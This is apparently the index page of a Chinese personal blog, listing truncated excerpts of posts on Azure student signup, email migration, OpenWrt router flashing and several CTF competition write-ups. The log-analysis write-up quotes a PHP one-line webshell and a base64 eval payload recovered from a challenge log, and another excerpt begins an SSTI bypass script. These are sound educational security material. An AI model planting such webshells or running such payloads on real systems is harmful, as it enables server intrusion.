GamerNoTitle

Created2025-02-21|Tech|Azure•Education

自从拿到教育邮箱，我就在想怎么样才能够用尽其用，拿到更多的教育优惠资源，然后今天我就盘了盘Azure，据说Azure对学生有每年100$的免费额度，这我不得赶紧下个手注册教育用户首先，你得先去Azure登录一个微软账号（可以是个人的） Azure Portal: https://portal.azure.com/ 登陆以后会进入Azure的主页，我们不需要在这个页面操作，先把它关掉，只需要有登录态就可以了接着我们打开AZ100的注册页面 AZ100: https://signup.azure.com/studentverification?offerType=1&srcurl=https%3A%2F%2Fazure.microsoft.com%2Ffree%2Fstudents&correlationId=bbc11038-628a-4b5a-abf5-e141999f96d9 在这个页面中，填写自己的个人信息，注意有些信息的真实性（例如你明明用的是@*.edu.cn你的国家还选其他的那肯定不对）填好了以后提交（验证码留空就行，除非你有），然后打开你的教 ...

VNCTF2025 个人Writeup（垂死挣扎记录）

Created2025-02-09|CTF|CTF•VNCTF

官方WP：http://ctf-files.bili33.top/VNCTF2025/VNCTF2025%20Official%20Writeup.pdf [Reverse] Hook Fish 钓到的鱼怎么跑了？下载下来一个apk文件，丢进jadx查看AndroidManifest.xml看到第一个Activity是com.example.hihitt.MainActivity 找到Activity看到里面有一些函数 123456789101112131415161718192021222324252627282930313233343536373839404142434445 public void loadClass(String input0) { String input1 = encode(input0); File dexFile = new File(getExternalFilesDir(Environment.DIRECTORY_DOWNLOADS), "hook_fish.dex"); ...

迁移自定义域名邮箱服务到Larksuite（飞书国际版）

Created2025-01-25|Tech|Larksuite•Office365•Mail

前言在昨天早上，我起床后日常刷手机，突然看到了这一条消息于是我打开了Office 365，想看看我有没有被算账，结果就是不出意外的出意外了，我的E5也没了于是我赶紧打开微信通知组织里面的用户，让他们赶紧迁移数据后，我开始寻找Office 365的替代品对我来说，我其实还有个Office 365 E3 MSDN的子账户，所以对于软件的影响并不大，而我的onedrive里面也没有什么贵重的东西，而且也少用。最麻烦的就是我的自定义域名邮箱（本站的评论通知）是托管在微软那里的，而如果没有Office授权，账号是用不了Outlook的，所以我得寻找一个能够替代它的服务，最后Lark出现在了我的视野里准备工作一个工作情况良好的梯子对自己域名DNS设置的访问权限已经创建完“公司”的lark账号（强烈建议直接Google或者Apple登录）绑定域名点到除了首页以外的任何一个Lark页面，在登录后，右上角有个由9个点组成的图标，点一下就能看到管理后台了（前提是管理员账户）直接进入管理后台界面，在上面找到产品设置，然后在里面就能够看到邮箱在域名管理里面可以看到添加域名（我这里 ...

【Volcania】第八届西湖论剑·网络安全大会初赛Writeup

Created2025-01-18|CTF|CTF•西湖论剑

我猜你是那种下载文件夹里一堆“西湖论剑附件”，16:00的时候看着自己的排名发现自己论剑论了个寂寞的玩家 [DS] easydatalog | @Luminoria | 未出请你对附件中的日志文件进行分析，找出“张三”的身份证号和手机号，譬如其身份证号是119795199308186673，手机号是73628276413，则提交的flag为“119795199308186673_73628276413”。打开附件，发现error.log体积比较大，里面有很多的内容 204行发现一句话木马 <?php eval($_POST[1]);?> 252行及后面发现多行b64编码内容，且每个的内容不一样 1@eval(@base64_decode($_POST['lc134a7d99e04f']));&lc134a7d99e04f=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXI ...

【Volcania】第十八届2025软件系统安全赛华南赛区（CCSSSC2025）Writeup - TEAM Volcania

Created2025-01-06|CTF|CTF•CCSSSC•CCSSSC2025

钓鱼邮件 | @Luminoria Bob收到了一份钓鱼邮件，请找出木马的回连地址和端口。假如回连地址和端口为123.213.123.123:1234，那么敏感信息为MD5(123.213.123.123:1234)，即d9bdd0390849615555d1f75fa854b14f，以Cyberchef的结果为准。附件是邮件的eml文件，处理一下，删除部分标记，可以得到附件部分的base64编码值，尝试赛博厨师解码，发现PK头用Python处理，写成文件 1234567891011import base64with open("email.txt") as f: data = f.read().replace("\r\n", "") with open("raw.txt", "wt") as f: f.write(data)with open("file", "wb") as f: dec_data = base ...

【Volcania】2025 CISCN x 长城杯铁人三项初赛Writeup

Created2024-12-15|CTF|CTF•CISCN

[WEB] Safe_Proxy | @RonSSTI题，用学校的祖传脚本一把梭 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899def generate_number(num:int): num_map = { 0:'([]|length)', 1:'([g]|length)', 5:'(()|select|string|wordcount)', 6:'(()|select|string|urlencode|wordcount)', 12:'([g,g,g]|wordcount) ...

2024年 GDUTCTF 个人WriteUp

Created2024-12-09|CTF|CTF•GDUTCTF

日志分析近日xxa集团的某终端遭到DNS劫持的恶意攻击，导致大量的服务器、应用、个人终端都无法正常的访问，请找出被劫持的服务器IP 打开后在Wireshark里面过滤器填写dns，过滤所有的DNS请求然后随便拉一下就发现，有对外网DNS服务器进行查询的操作，这个IP是61.7.12.5，所以答案为flag{61.7.12.5} RSA yafu 题目说了用yafu，咱就上yafu呗 123456789101112131415161718192021> .\yafu-x64.exe "factor(5732964453789005656202220060994030976008462483974106949360656685503394408870148542074882576415254144726130307660083216338644162341371153570939410807509529736550955786833199064934462338627066079768583784202430670910414267735660 ...

ADCTF2024 个人Writeup

Created2024-12-07|CTF|CTF•ADCTF

MISC[Easy] nolibc 坏了，刚刚不小心把 libc 删掉了，输入什么都没用了，怎么办呜呜呜 T_T。求求你惹，能不能帮我把一份重要文件（指 flag）拿出来，待会儿就要用惹xwx。 rkk是不是做了MoeCTF的那个题所以出了这个…… 这题我直接把我MoeCTF的Payload拿过来用的，但是跟那个题目不一样的地方在于我们不知道flag在哪里，所以我先试试看看当前目录的东西当然，没有libc，我们是用不了ls的，所以我用了echo * 得到flag的文件名为4La9-83c566f8，还是因为没有libc，所以没有cat，所以用while+read 1$ while IFS= read -r line; do echo "$line"; done < 4La9-83c566f8 然后就得到flag了 [Easy] py_jail连接题目得到源码 12345678910111213141516code = input('> ') + '\n'while True: _ = ...

从零开始！在红米AX6000路由器上刷入Openwrt

Created2024-11-10|Tech|Tech•Openwrt•Redmi•Router

在我前两天搞定TPLINK后，近期跟我聊到路由器的同学买了个红米的AX6000，想自己刷，发现自己搞不定了求助于我，于是我们一起刷这台路由器，就有了这篇教程准备工作首先得把小米路由器的系统降级，这位同学拿过来的时候，他降级到了1.0.60，所以降级过程就没有什么教程啦，可以去网上找找旧版的包，然后直接通过路由器管理面板的升级部分刷就行了打开Telnet（路由器的开发者模式）我们降级好路由器后，先要打开telnet，才能打开SSH，打开telnet的过程不要联网！！！实测联网会打不开telnet 首先我们要登录进路由器的管理面板，在管理面板的地址栏中有我们需要的stok，例如http://192.168.31.1/cgi-bin/luci/;stok=71871cc803318e6f85e9c73d2ed7736c，这个stok=后面的内容就是我们需要的stok，我们复制下来，替换掉下面链接中的{stok}，并复制到浏览器访问（访问的结果统一会显示{code: 0}，四次访问都是，不再赘述，我使用的是curl） http://192.1 ...

中国科学技术大学第十一届信息安全大赛（Hackgame2024）个人题解Writeup

Created2024-11-09|CTF|CTF•Hackergame•Hackergame2024

Web签到让我们说……各种语言，开始今年的冒险！提示输入不同语言的启动，从F12开发者工具复制一个进去发现不让粘贴，点击了底下的发现会传入URL的参数pass=false，改为true就得到flag了 flag为flag{WeLC0Me-7o-hACkErg@mE-AND-ENJOY-HAcKINg-Zo24} 喜欢做签到的 CTFer 你们好呀喜欢做签到的 CTFer 你们好呀，我是一道更典型的 checkin：有两个 flag 就藏在中国科学技术大学校内 CTF 战队的招新主页里！ Checkin Again在网上冲浪可以找到这个网页 NebuTerm 输入help可以看到可用的命令，里面发现有env 输入env得到flag：flag{actually_theres_another_flag_here_trY_to_f1nD_1t_y0urself___join_us_ustc_nebula} PaoluGPT 在大语言模型时代，几乎每个人都在和大语言模型聊天。小 Q 也想找一个方便使用的 GPT 服务，所以在熟人推荐下， ...

Announcement

.------.--------.---------.
| .=====================. |\
| | 7  3  5  5  6  0  8 | | |
| +=====================+ | |
|----------------------\\-. |
|    *   |      ^|^    || |\|
|   .-----------------.|| | |
|   |  1  |  2  |  3  ||| | |
|   |-----+-----+-----||| | |
|   |  4  |  5  |  6  ||| | |
|   |-----+-----+-----||| | |
|   |  7  |  8  |  9  ||| | |
|   |-----+-----+-----|// | |
|   |  *  |  0  |  #  |/  | |
|   +-----------------+   | |
|       |       |         | |
+-------+-------+---------+ |
\______\_______\_________+\/

gamernotitle@site_web > ./plant.sh
Boom has been planted.